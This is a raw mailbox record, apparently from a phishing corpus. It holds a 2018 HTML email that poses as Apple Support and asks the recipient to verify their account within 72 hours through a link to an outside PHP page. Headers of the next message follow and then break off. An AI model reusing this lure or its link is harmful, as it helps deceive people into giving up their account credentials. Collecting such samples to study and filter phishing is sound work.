From: "=?utf-8?Q?Service?=" <service@infinumhost.us> 
To: "jose@monkey.org" <jose@monkey.org>
Date: Mon, 11 Jun 2018 05:28:53 -0700
Subject: =?utf-8?Q?Account=20Alerts=20=21=21?=
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_=aspNetEmail=_e66972ef5b9c4e63ba8a687d69898862"
Message-ID: <WIN82UT6CPKC5J18b59cf332124f69a49ecdc9966986fd@WIN82UT6CPKC5J>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 518

--_=aspNetEmail=_e66972ef5b9c4e63ba8a687d69898862
Content-Type: text/html;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<=21DOCTYPE HTML PUBLIC =22-//W3C//DTD HTML 4=2E0 Transitional//EN=22>=0D=
=0A<HTML><HEAD></HEAD>=0D=0A<BODY>=0D=0A<DIV>=0D=0A<DIV></DIV></DIV>=0D=0A=
<DIV>=0D=0A<DIV>=0D=0A<DIV style=3D=22BACKGROUND-COLOR: =23fff=22>=0D=0A<=
DIV dir=3Dltr>=0D=0A<DIV>=0D=0A<TABLE style=3D=22WIDTH: 796px=22 cellSpac=
ing=3D0 cellPadding=3D0 border=3D0>=0D=0A  <TBODY>=0D=0A  <TR>=0D=0A    <=
TD style=3D=22WIDTH: 792px=22>=0D=0A      <TABLE style=3D=22WIDTH: 704px=22=
 cellSpacing=3D0 cellPadding=3D0 border=3D0>=0D=0A        <TBODY>=0D=0A  =
      <TR style=3D=22VERTICAL-ALIGN: inherit; DISPLAY: table-row=22>=0D=0A=
          <TD style=3D=22DISPLAY: table-cell=22>=26nbsp;</TD></TR>=0D=0A =
       <TR>=0D=0A          <TD =0D=0A          style=3D=27WIDTH: 626px; C=
OLOR: rgb(51,51,51); PADDING-BOTTOM: 18px; PADDING-TOP: 0px; FONT: 300 14=
px/18px =22Lucida Grande=22, =22Lucida Sans=22, =22Lucida Sans Unicode=22=
, sans-serif, Arial, Helvetica, Verdana, sans-serif; PADDING-LEFT: 5=25; =
PADDING-RIGHT: 5=25; font-stretch: normal=27>=0D=0A            <DIV><SPAN=
 style=3D=22FONT-FAMILY: arial,helvetica,sans-serif=22><SPAN =0D=0A      =
      style=3D=22FONT-SIZE: 14px=22><STRONG>Apple</STRONG></SPAN>=26nbsp;=
</SPAN>=26nbsp; =0D=0A            =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26=
nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =0D=0A            =26nbsp; =26n=
bsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =0D=0A=
            =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp=
; =26nbsp; =26nbsp; =0D=0A            =26nbsp; =26nbsp; =26nbsp; =26nbsp;=
 =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =0D=0A            =26nbsp; =
=26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =0D=
=0A            =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26nbsp; =26n=
bsp; =26nbsp; =26nbsp; =0D=0A            =26nbsp; =26nbsp; =26nbsp; =26nb=
sp; =26nbsp; =26nbsp;=26nbsp;</DIV></TD></TR>=0D=0A        <TR>=0D=0A    =
      <TD =0D=0A          style=3D=27WIDTH: 626px; COLOR: rgb(51,51,51); =
PADDING-BOTTOM: 18px; PADDING-TOP: 0px; FONT: 300 14px/18px =22Lucida Gra=
nde=22, =22Lucida Sans=22, =22Lucida Sans Unicode=22, sans-serif, Arial, =
Helvetica, Verdana, sans-serif; PADDING-LEFT: 5=25; PADDING-RIGHT: 5=25; =
font-stretch: normal=27><SPAN =0D=0A            style=3D=22FONT-FAMILY: =27=
trebuchet ms=27,helvetica,sans-serif=22>Dear=2E</SPAN>=0D=0A            <=
P><SPAN =0D=0A            style=3D=22FONT-FAMILY: =27trebuchet ms=27,helv=
etica,sans-serif=22>This is an =0D=0A            automatic message by the=
 system to let you know that you have to =0D=0A            verify your Ac=
count information within 72 hours=2E We are currently =0D=0A            u=
pdating our systems to a new version ,So we invite you to verify =0D=0A  =
          your information, Once you have verify your account records, yo=
ur =0D=0A            information will be confirmed and your account will =
start to work as =0D=0A            normal=2E</SPAN></P></TD></TR>=0D=0A  =
      <TR>=0D=0A          <TD =0D=0A          style=3D=27WIDTH: 626px; CO=
LOR: rgb(51,51,51); PADDING-BOTTOM: 18px; PADDING-TOP: 0px; FONT: 300 23p=
x/18px =22Lucida Grande=22, =22Lucida Sans=22, =22Lucida Sans Unicode=22,=
 sans-serif, Arial, Helvetica, Verdana, sans-serif; PADDING-LEFT: 5=25; P=
ADDING-RIGHT: 5=25; font-stretch: normal=27>=0D=0A            <H3 =0D=0A =
           style=3D=27FONT-FAMILY: =22Lucida Grande=22, Helvetica, Arial,=
 sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none=
; COLOR: rgb(0,0,0); FONT-STYLE: normal; TEXT-ALIGN: left; ORPHANS: 2; WI=
DOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT=
-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; =
-webkit-text-stroke-width: 0px; text-decoration-style: initial; text-deco=
ration-color: initial=27><TT><SPAN =0D=0A            style=3D=22FONT-FAMI=
LY: verdana, geneva, sans-serif; FONT-WEIGHT: 400=22><A =0D=0A           =
 href=3D=22http://c0080599=2Eferozo=2Ecom/safepage=2Ephp=22 target=3D_bla=
nk><FONT =0D=0A            size=3D3>Verify Your Account</FONT></A></SPAN>=
</TT></H3></TD></TR>=0D=0A        <TR>=0D=0A          <TD =0D=0A         =
 style=3D=27WIDTH: 626px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 18px; PAD=
DING-TOP: 0px; FONT: 300 14px/18px =22Lucida Grande=22, =22Lucida Sans=22=
, =22Lucida Sans Unicode=22, sans-serif, Arial, Helvetica, Verdana, sans-=
serif; PADDING-LEFT: 5=25; PADDING-RIGHT: 5=25; font-stretch: normal=27><=
SPAN =0D=0A            style=3D=22FONT-FAMILY: trebuchet ms,helvetica,san=
s-serif=22>This link =0D=0A            will expire three days after this =
email was sent=2E</SPAN></TD></TR>=0D=0A        <TR>=0D=0A          <TD =0D=
=0A          style=3D=27WIDTH: 626px; COLOR: rgb(51,51,51); PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; FONT: bold 14px/18px =22Lucida Grande=22, =22Lu=
cida Sans=22, =22Lucida Sans Unicode=22, sans-serif, Arial, Helvetica, Ve=
rdana, sans-serif; PADDING-LEFT: 5=25; PADDING-RIGHT: 5=25; font-stretch:=
 normal=27>=0D=0A            <P><SPAN style=3D=22FONT-FAMILY: trebuchet m=
s,helvetica,sans-serif=22>Why =0D=0A            you received this email ?=
</SPAN></P>=0D=0A            <P>=26nbsp;</P></TD></TR>=0D=0A        <TR>=0D=
=0A          <TD =0D=0A          style=3D=27WIDTH: 626px; COLOR: rgb(51,5=
1,51); PADDING-BOTTOM: 18px; PADDING-TOP: 0px; FONT: 300 14px/18px =22Luc=
ida Grande=22, =22Lucida Sans=22, =22Lucida Sans Unicode=22, sans-serif, =
Arial, Helvetica, Verdana, sans-serif; PADDING-LEFT: 5=25; PADDING-RIGHT:=
 5=25; font-stretch: normal=27>=0D=0A            <P><SPAN =0D=0A         =
   style=3D=22FONT-FAMILY: =27trebuchet ms=27,helvetica,sans-serif=22>Thi=
s email =0D=0A            was sent automatically during routine security =
checks=2E To protect =0D=0A            your account from spam phishing an=
d to continue using our =0D=0A            service=2E<SPAN =0D=0A         =
   style=3D=22FONT-FAMILY: trebuchet ms,helvetica,sans-serif=22>=26nbsp;<=
/SPAN></SPAN></P></TD></TR>=0D=0A        <TR>=0D=0A          <TD =0D=0A  =
        style=3D=22COLOR: =23333; PADDING-BOTTOM: 51px; PADDING-TOP: 18px=
; FONT: 300 14px/18px =27Lucida Grande=27,Lucida Sans,Lucida Sans Unicode=
,sans-serif,Arial,Helvetica,Verdana,sans-serif; PADDING-LEFT: 5=25; PADDI=
NG-RIGHT: 5=25=22 =0D=0A          colSpan=3D2>=0D=0A            <P><SPAN =
=0D=0A            style=3D=22FONT-FAMILY: trebuchet ms,helvetica,sans-ser=
if=22>Apple =0D=0A            Support=2E</SPAN></P>=0D=0A            <P><=
SPAN =0D=0A            style=3D=22FONT-FAMILY: trebuchet ms,helvetica,san=
s-serif=22><SPAN =0D=0A            style=3D=22FONT-SIZE: 14px; COLOR: rgb=
(0,0,0); WIDOWS: 1; BACKGROUND-COLOR: rgb(250,250,250)=22>Thanks,</SPAN><=
BR =0D=0A            style=3D=27FONT-SIZE: 14px; FONT-FAMILY: =22lucida g=
rande=22, helvetica, arial, verdana, sans-serif; COLOR: rgb(0,0,0); WIDOW=
S: 1; BACKGROUND-COLOR: rgb(250,250,250)=27><SPAN =0D=0A            style=
=3D=22FONT-SIZE: 14px; COLOR: rgb(0,0,0); WIDOWS: 1; BACKGROUND-COLOR: rg=
b(250,250,250)=22>Billing =0D=0A            Department=2E</SPAN></SPAN></=
P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></DIV><FOOTER =0D=0A=
style=3D=22WIDTH: 100=25=22>=0D=0A<DIV style=3D=22DISPLAY: none=22>=26nbs=
p;</DIV>=0D=0A<TABLE style=3D=22WIDTH: 704px=22 cellSpacing=3D0 cellPaddi=
ng=3D0 border=3D0>=0D=0A  <TBODY>=0D=0A  <TR></TR>=0D=0A  <TR>=0D=0A    <=
TD style=3D=22WIDTH: 700px=22>=26nbsp;</TD></TR>=0D=0A  <TR>=0D=0A    <TD=
 =0D=0A    style=3D=22WIDTH: 700px; COLOR: rgb(136,136,136); PADDING-BOTT=
OM: 0px; TEXT-ALIGN: center; PADDING-TOP: 0px; FONT: 11px/15px Geneva, Ve=
rdana, Arial, Helvetica, sans-serif; PADDING-LEFT: 0px; PADDING-RIGHT: 0p=
x; font-stretch: normal=22><A =0D=0A      style=3D=22TEXT-DECORATION: non=
e; COLOR: =2308c=22  href=3D=22http://127=2E0=2E0=2E1/us/=22 target=3D_bl=
ank>Apple =0D=0A      ID</A> =7C <A style=3D=22TEXT-DECORATION: none; COL=
OR: =2308c=22  href=3D=22http://127=2E0=2E0=2E1/support/=22 target=3D_bla=
nk>Support</A> =7C <A style=3D=22TEXT-DECORATION: none; COLOR: =2308c=22 =
=0D=0A       href=3D=22http://127=2E0=2E0=2E1/privacy/=22 target=3D_blank=
>Privacy Policy</A></TD></TR>=0D=0A  <TR>=0D=0A    <TD =0D=0A    style=3D=
=22MARGIN-BOTTOM: 0px; WIDTH: 700px; COLOR: rgb(136,136,136); PADDING-BOT=
TOM: 0px; TEXT-ALIGN: center; PADDING-TOP: 0px; FONT: 11px/15px Geneva, V=
erdana, Arial, Helvetica, sans-serif; PADDING-LEFT: 0px; PADDING-RIGHT: 0=
px; font-stretch: normal=22>Copyright =0D=0A      =26=23169; 2016 <SPAN s=
tyle=3D=22DISPLAY: block=22>Apple Distribution International, =0D=0A     =
 Luxembourg Branch, 31-33, rue Sainte Zithe, L-2763 Luxembourg=26=238206;=
</SPAN> All =0D=0A      Rights Reserved=2E</TD></TR></TBODY></TABLE></FOO=
TER></DIV></DIV>=0D=0A<DIV>=26nbsp;</DIV>=0D=0A<DIV>=26nbsp;</DIV></DIV>=0D=
=0A<DIV style=3D=22DISPLAY: none=22>=26nbsp;</DIV>=0D=0A<DIV>=26nbsp;</DI=
V></DIV>=0D=0A<DIV>=26nbsp;</DIV></BODY></HTML>=0D=0A

--_=aspNetEmail=_e66972ef5b9c4e63ba8a687d69898862--


From jose@monkey.org Wed Jun 13 15:47:03 2018 +0000
Return-Path: meredith.wall@spartanburg2.k12.sc.us
Delivered-To: jose@monkey.org
X-FDA: 74271964326.26.hen29_775c8972e9056
X-Spam-Summary: 50,0,0,31b713f5b83b861e,d41d8cd98f00b204,meredith.wall@spartanburg2.k12.sc.us,:meredith.wall@spartanburg2.k12.sc.us,RULES_HIT:10:72:327:334:355:368:369:379:582:599:960:962:967:973:978:983:988:989:1152:1158:1189:1208:1221:1260:1313:1314:1345:1359:1381:1431:1436:1437:1516:1517:1518:1575:1588:1589:1592:1594:1730:1776:1792:2525:2527:2568:2610:2682:2685:2693:2859:2892:2901:2905:2911:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3586:3865:3867:3868:3871:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4250:4425:5007:6238:6248:6650:6675:6678:6703:7901:8512:8518:8603:8957:9025:9149:9868:10004:10346:11289:11527:11656:11875:11914:12043:12438:12519:12555:12679:12812:12895:12986:13005:13017:13018:13019:13139:13161:13180:13205:13229:13237:13439:13893:14096:14659:21080:21107:21364:21433:21451:21483:21524:21627:21790:30022:30054:30069:30070:30075:30090,0,RBL:165.166.63.66:@spartanburg2.k12.sc.us:.lbl8.mailshell.net-62.34.0.100 64.100.201.
X-HE-Tag: hen29_775c8972e9056
X-Filterd-Recvd-Size: 38236
Received: from EXCHANGE1.district2.com (unknown [165.166.63.66])
	by imf10.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 13 Jun 2018 15:47:00 +0000 (UTC)
Received: from EXCHANGE1.district2.com ([::1]) by EXCHANGE1.district2.com
 ([::1]) with mapi id 14.03.0399.000; Wed, 13 Jun 2018 11:46:51 -0400
